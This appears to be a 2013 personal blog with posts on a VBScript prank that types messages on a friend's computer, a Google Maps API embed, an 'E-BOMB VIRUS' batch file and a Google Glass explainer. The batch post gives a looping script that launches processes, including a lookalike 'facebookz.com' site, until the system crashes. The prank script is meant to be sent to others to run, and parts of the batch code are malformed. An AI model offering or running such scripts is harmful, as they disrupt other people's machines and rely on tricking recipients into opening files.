Friday 28 June 2013

Ghost typing

The below script will automatically type the hellow  "how are u "in your friends computer when
your friend opens the .vbs file

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo “
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re “
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? “
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

Save it as “Anything.VBS” and send it.

proverb:

The shower smiles in a politician

Monday 10 June 2013

THE CODE TOEMBED GOOGLE GEOCODE API TO YOUR WEBSITE

step1: copy and past the below code in  file manger of the free hosting site 

<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
    <marquee>enter and get your location</marquee>
    <title>Google Maps API Example: Simple Geocoding</title>
    <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAjU0EJWnWPMv7oQ-jjS7dYxSPW5CJgpdgO_s4yyMovOaVh_KvvhSfpvagV18eOyDWu7VytS6Bi1CWxw"
      type="text/javascript"></script> /* this is the api whcih connect to google mapss */
    <script type="text/javascript">

    var map = null;
    var geocoder = null;

    function initialize() {
      if (GBrowserIsCompatible()) {
        map = new GMap2(document.getElementById("map_canvas"));
        map.setCenter(new GLatLng(37.4419, -122.1419), 1);
        map.setUIToDefault();
        geocoder = new GClientGeocoder();
      }
    }

    function showAddress(address) {
      if (geocoder) {
        geocoder.getLatLng(
          address,
          function(point) {
            if (!point) {
              alert(address + " not found");/* if wrong address entered */
            } else {
              map.setCenter(point, 15);
              var marker = new GMarker(point, {draggable: true});
              map.addOverlay(marker);
              GEvent.addListener(marker, "dragend", function() {
                marker.openInfoWindowHtml(marker.getLatLng().toUrlValue(6));
              });
              GEvent.addListener(marker, "click", function() {
                marker.openInfoWindowHtml(marker.getLatLng().toUrlValue(6));
              });
     GEvent.trigger(marker, "click");
            }
          }
        );
      }
    }
    </script>
  </head>

  <body onload="initialize()" onunload="GUnload()"> /* this  line will intiliaze the geocode function */
    <form action="#" onsubmit="showAddress(this.address.value); return false"> /*this line  will display the address by getting the value from address.value on submit*/
      <p>
        Enter an address, and then drag the marker to tweak the location.
        <br/>
        The latitude/longitude will appear in the in of window after each geocode/drag.
      </p>
      <p>
        <input type="text" style="width:350px" name="address" value="413 Bazaar street, salem" />
        <input type="submit" value="Go!" />
      </p>
      <div id="map_canvas" style="width: 600px; height: 800px"></div>
    </form>

  </body>
</html>

Thursday 6 June 2013

E-BOMB VIRUS

1. Click on Start-> Run -> NotePad.
2. Copy the following code.

@echo off
color 3
cls
msg * (E-BOMB)
cls
msg * (YOUR MSG HERE)
cls


:begin
goto %random% /*this command opens the process randomly*/

:1
start cmd.exe
goto begin 

:2
start notepad.exe /*this will open notpad */
goto begin 

:3
start explorer.exe
goto begin :4
start iexplore.exe
goto begin 

:5
start vlc.exe
goto begin 

:6
start chrome.exe "www.facebookz.com"
goto begin

3. Now save the notepad as filename.bat
4. Now dare to open the filename.bat

If u run this ur system will crash because the above program opens multiple processes 


TO recover from a e-bomb open task manager and end the process tree of the filename.bat

Tuesday 4 June 2013

Google Glass Demilsified

Weareable  device are now becoming more and more popular ex. sony smart watch.Google glass is smart glass which  gives all the features of a smartphone,desktop computer just through our vision .Google glass works on the principle of augmented reality .Augmented reality is the ability to project the surrounding environment with map or any other symbol etc. Augmented reality differs from virtual reality .Virtual reality  replaces the real world with stimulated world but augmentation is  just adding semantic context to the environment element  augmentation makes us more interactive to the environment. One of the cool features about google glass is it augments the real world with the help of our vision.

Google glass consist of:


  • cpu with gps 
  • projector & lense
  • camera
  • mic
  • battery 

cpu and gps:

cpu is used to drive the entire google glass by generating control signals  the input for the cpu is given through several sensors for ex: a temperature sensor is used to give input about the temperature  and the cpu is used to generate corresponding output google glass also consist of a Global Positioning System(gps) it gives details about the our location via a satellite.

projector & lense:

projector and lens are one of the important element of the google glass projector helps to augments the real world with layers the layers are semantic context that must be generated by the cpu or gps . The layers are projected to the prism  and the prism sends the visible light via the lense  to the environment .This is how the layers are projected to the real world.




camers:

The google glass is embeded with a camera the we can take photos and videos whenever we want .if we want to take a pic we can take a pic we can can say to the glass to take this pic and the pic will be take and we can store in memory .

Mic:

The mic makes the google say more interactive it informs the user about the output generated by the cpu via voice it makes the google  glass very very user friendly





Features of google glass:


  • Say "take a picture" to take a picture
  • Record what u see hands free
  • We can share what we record
  • We can ask what is in our mind(ex.what is the meaning of love)
  • We can also get directions





Total Pageviews